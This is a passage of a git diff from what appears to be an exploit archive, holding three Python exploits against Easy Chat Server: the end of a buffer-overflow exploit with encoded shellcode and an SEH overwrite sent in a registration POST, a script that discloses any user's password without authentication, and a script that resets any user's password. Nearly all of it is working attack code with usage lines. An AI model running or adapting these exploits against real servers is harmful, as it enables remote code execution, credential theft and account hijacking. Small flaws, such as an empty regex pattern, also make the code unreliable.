+"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39" +"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e" +"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50" +"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31" +"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31" +"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35" +"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30" +"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31" +"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a" +"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36" +"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f" +"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58" +"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34" +"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b" +"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d" +"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39" +"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50" +"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56" +"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45" +"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59" +"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f" +"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45" +"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50" +"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32" +"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57" +"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57" +"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46" +"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31" +"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f" +"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56" +"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45" +"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a" +"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c" +"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37" +"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f" +"\x4e\x35\x41\x41") + +magic = "B" * 217 +magic += "\xeb\x06\x90\x90" +magic += "\xBC\x04\x01\x10" +magic += shellcode + +magic += "C" * 200 + + +buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n" +buffer += "Host: 192.168.1.11" +buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" +buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +buffer += "Accept-Language: en-US,en;q=0.5" +buffer += "Accept-Encoding: gzip, deflate" +buffer += "Referer: http://192.168.1.11/register.ghp" +buffer += "Connection: close" +buffer += "Content-Type: application/x-www-form-urlencoded" + +buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" + +socket.send(buffer) + +data = socket.recv(4096) +print data +socket.close() diff --git a/platforms/windows/webapps/42153.py b/platforms/windows/webapps/42153.py new file mode 100755 index 000000000..b9c7418ab --- /dev/null +++ b/platforms/windows/webapps/42153.py @@ -0,0 +1,40 @@ +# Exploit Title: Easy Chat Server Remote Password Disclosure +# Date: 09/10/2017 +# Software Link: http://echatserver.com/ecssetup.exe +# Exploit Author: Aitezaz Mohsin +# Vulnerable Version: v2.0 to v3.1 +# Vulnerability Type: Pre-Auth Remote Password Disclosure +# Severity: Critical + +# ========================================================================================================= +# Registeration page 'register.ghp' allows disclosing ANY user's password. +# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password. +# ========================================================================================================= + +# USAGE: python exploit.py ip username + +#!/usr/bin/python + +import urllib +import re +import requests +import sys + +ip = sys.argv[1] +username = sys.argv[2] + +url = 'http://' + ip + '/register.ghp?username=' + username + '&password=' +response = requests.get(url) +html = response.content + +pattern = '' +result = re.compile(pattern) + +password = re.findall(result,html) + +x = ''.join(password) + +password = x.replace("[", "") +password = x.replace("]", "") + +print "Password: " + password diff --git a/platforms/windows/webapps/42154.py b/platforms/windows/webapps/42154.py new file mode 100755 index 000000000..312a543e6 --- /dev/null +++ b/platforms/windows/webapps/42154.py @@ -0,0 +1,45 @@ +# Exploit Title: Easy Chat Server Remote Password Reset +# Date: 09/10/2017 +# Software Link: http://echatserver.com/ecssetup.exe +# Exploit Author: Aitezaz Mohsin +# Vulnerable Version: v2.0 to v3.1 +# Vulnerability Type: Pre-Auth Remote Password Reset +# Severity: Critical + +# ==================================================================================================== +# Registeration page 'register.ghp' allows resetting ANY user's password. +# Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account. +# ==================================================================================================== + +# USAGE: python exploit.py ip port username password + +#!/usr/bin/python + +import os,sys,socket + +ip = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + +socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) + +socket.connect((ip , 80)) + + +buffer = "POST /registresult.htm HTTP/1.1" +buffer += "Host: 192.168.1.11" +buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" +buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +buffer += "Accept-Language: en-US,en;q=0.5" +buffer += "Accept-Encoding: gzip, deflate" +buffer += "Connection: close" +buffer += "Content-Type: application/x-www-form-urlencoded" + +buffer += "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change" + +socket.send(buffer) + +socket.close() + +print "[#] Password Changed Successfully" +